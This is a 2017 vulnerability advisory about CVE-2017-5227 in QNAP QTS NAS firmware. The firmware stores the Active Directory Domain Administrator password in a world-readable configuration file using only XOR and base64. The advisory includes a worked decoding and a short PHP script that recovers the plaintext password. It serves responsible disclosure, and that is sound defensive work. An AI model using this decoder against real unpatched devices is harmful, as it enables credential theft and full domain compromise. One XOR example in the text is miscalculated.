QNAP QTS Privilege Escalation / Information Disclosure
Posted on 23 March 2017
QNAP QTS Domain Privilege Escalation Vulnerability Name Sensitive Data Exposure in QNAP QTS Systems Affected QNAP QTS (NAS) all model and all versions < 4.2.4 Severity High 7.9/10 Impact CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L Vendor http://www.qnap.com/ Advisory http://www.ush.it/team/ush/hack-qnap/qnap.txt Authors Pasquale "sid" Fiorillo (sid AT ush DOT it) Guido "go" Oricchio (g.oricchio AT pcego DOT com) Date 20170322 I. BACKGROUND QNAP Systems, founded in 2004, provides network attached storage (NAS) and network video recorder (NVR) solutions for home and business use to the global market. QNAP also delivers a cloud service, called myQNAPcloud, that allows users to access and manage the devices from anywhere. QTS is a QNAP devices proprietary firmware based on Linux. ISGroup (http://www.isgroup.biz/) is an Italian Information Security boutique, we found this 0day issue while supporting Guido Oricchio of PCego, a System Integrator, to secure a QNAP product for one of his customer. Responsible disclosure with Qnap: we contacted qnap on public security@ contact and we escalate fast to their Security Researcher Myron Su on PGP emails. Prior vulnerabilities in QNAP: https://www.qnap.com/en/support/con_show.php?op=showone&cid=41 Information to customers of the vulnerability is shown in their bulletin ID NAS-201703-21 (https://www.qnap.com/en/support/con_show.php?cid=113): QTS 4.2.4 Build 20170313 includes security fixes for the following vulnerabilities: Configuration file vulnerability (CVE-2017-5227) reported by Pasquale Fiorillo of the cyber security company ISGroup (www.isgroup.biz), a cyber security company, and Guido Oricchio of PCego (www.pcego.com), a system integrator. The latest version of the software at the time of writing can be obtained from: https://www.qnap.com/en-us/product_x_down/ https://start.qnap.com/en/index.php https://www.qnap.com/ II. DESCRIPTION The vulnerability allows a local QTS admin user, or other low privileged user, to access configuration file that includes a bad crypted Microsoft Domain Administrator password if the NAS was joined to a Microsoft Active Directory domain. The affected component is the "uLinux.conf" configuration file, created with a world-readable permission used to store a Domain Administrator password. Admin user can access the file using ssh that is enabled by default. Other users are not allowed to login, so they have to exploit a component, such as a web application, to run arbitrary command or arbitrary file read. TLDR: Anyone is able to read uLinux.conf file, world readable by default, can escalate to Domain Administrator if a NAS is a domain member. III. ANALYSIS QNAP QTS stores "uLinux.conf" configuration file in a directory accessible by "nobody" and with permission that make them readable by "nobody". If the NAS was joined to an Active Directory, such file contain a Domain Administrator user and password in an easily decrypt format. In older versions of QTS the Domain Admin's password was stored in plaintext. A) Config file readable by "nobody" [~] # ls -l /etc/config/uLinux.conf -rw-r--r-- 1 admin administ 7312 Dec 10 06:39 /etc/config/uLinux.conf Our evidence is for QTS 4.2.0 and QTS 4.2.2 running on a TS-451U, TS-469L, and TS-221. Access to the needed file are guaranteed to all the local users, such as httpdusr used to running web sites and web application hosted on the NAS. This expose all the information contained in the configuration file at risk and this is a violation of the principle of least privilege. https://en.wikipedia.org/wiki/Principle_of_least_privilege B) Weak encrypted password in the configuration file The Microsoft Active Directory Admin username and password are stored in the file obfuscated by a simple XOR cypher and base64 encoded. In this scenario, a Local File Read vulnerability could lead to full domain compromise given the fact that an attacker can re-use such credentials to authenticate against a Domain Controller with maximum privileges. The password field in the uLinux.conf has the following format: User = <username> Password = <base64> eg: User = Administrator Password = AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== The "<base64>" decoded is: sid@zen:~$echo -n "AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw==" | base64 -d | hexdump -C 00000000 03 03 00 00 01 01 06 06 07 07 04 04 23 23 20 20 |............## | 00000010 21 21 26 26 27 27 24 24 43 |!!&&''$$C| 00000019 Each byte xored with x62 is the hex ascii code of the plaintext char. Eg: x03 ^ x62 = x61 (a) x00 ^ x62 = x61 (b) ... x24 ^ x62 = x46 (F) x43 ^ x62 = x21 (!) The plaintext password is: aabbccddeeffAABBCCDDEEFF! IV. EXPLOIT The following code can be used to decode the password: #!/usr/bin/php <?php $plaintext = str_split(base64_decode($argv[1])); foreach($plaintext as $chr) { echo chr(ord($chr)^0x62); } echo " "; Eg: sid@zen:~$ ./decode.php AwMAAAEBBgYHBwQEIyMgICEhJiYnJyQkQw== aabbccddeeffAABBCCDDEEFF! V. VENDOR RESPONSE Vendor released QTS 4.2.4 Build 20170313 that contains the proper security patch. At the time of this writing an official patch is currently available. VI. CVE INFORMATION Mitre assigned the CVE-2017-5227 for this vulnerability, internally to Qnap it's referred as Case NAS-201703-21. VII. DISCLOSURE TIMELINE 20161212 Bug discovered 20170106 Request for CVE to Mitre 20170106 Disclosure to security@qnap.com 20170107 Escalation to Myron Su, Security Researcher from QNAP (fast!) 20170107 Details disclosure to Myron Su 20170109 Got CVE-2017-5227 from cve-assign 20170110 Myron Su confirm the vulnerability 20170203 We asks for updates, no release date from vendor 20170215 We extend the disclosure date as 28 Feb will not be met 20170321 QNAP releases the QTS 4.2.4 Build 20170313 20170322 Advisory disclosed to the public VIII. REFERENCES [1] Top 10 2013-A6-Sensitive Data Exposure https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure [2] Access Control Cheat Sheet https://www.owasp.org/index.php/Access_Control_Cheat_Sheet [3] https://forum.qnap.com/viewtopic.php?t=68317 20121213 User reporting that the password was stored in plaintext in a world-readable file [4] https://www.qnap.com/en/support/con_show.php?cid=113 Qnap Security Bullettin NAS-201703-21 IX. CREDIT Pasquale "sid" Fiorillo and Guido "go" Oricchio are credited with the discovery of this vulnerability. Pasquale "sid" Fiorillo web site: http://www.pasqualefiorillo.it/ mail: sid AT ush DOT it Guido "go" Oricchio web site: http://www.pcego.com/ mail: g.oricchio AT pcego DOT com X. LEGAL NOTICES Copyright (c) 2017 Pasquale "sid" Fiorillo Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.